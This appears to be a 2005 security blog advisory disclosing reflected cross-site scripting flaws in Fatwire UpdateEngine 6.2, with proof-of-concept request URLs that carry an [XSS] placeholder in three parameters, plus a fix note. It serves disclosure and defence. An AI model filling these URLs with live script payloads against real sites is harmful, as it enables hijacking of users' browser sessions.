by r0t,der4444,cembo,VietMafia

Friday, December 23, 2005

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.fatwire.com/
affected version:6.2 and prior


Product Description:

UpdateEngine6 is a dynamic content management (DCM) solution to address some of the challenges facing enterprise-class e-business initiatives. Storing content at the field level in the database, allowing for the management of that content through an Web interface, exposing that content to innumerable uses, and publishing static Web pages and dynamic content form the basis of the UpdateEngine6 dCM solution. It enables business users to manage content, shortens installation and implementation time, provides a rich set of Web-based tools and wizards, and easily integrates with legacy systems. Since it is 100% Java, it can integrate with all major application servers, including IBM, BEA, Sun, Oracle and HP, and with all databases. Under an agreement made on May 1, 2002, FatWire's UpdateEngine announced that it will licensed Autonomy's advanced technology for its flagship product, UpdateEngine, to deliver a fully integrated categorization and retrieval solution into its content management software.

Vuln. Description:

UpdateEngine contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "FUELAP_TEMPLATENAME" "EMAIL" "COUNTRYNAME" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


poc:

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID
=FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D
66&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1404733&COUNT
RY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5
F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5FPAGE%5F1
415379&FUELAP_TEMPLATENAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_
TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_
ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402
412&EMAIL=[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COU
NTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID
=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELA
P_SITEDBID=SITE%5F%2D66&

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
MPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=
FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&
EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=IN
TSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHIT
EPAPERS%5F1300483&COUNTRYNAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
MPLATENAME=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew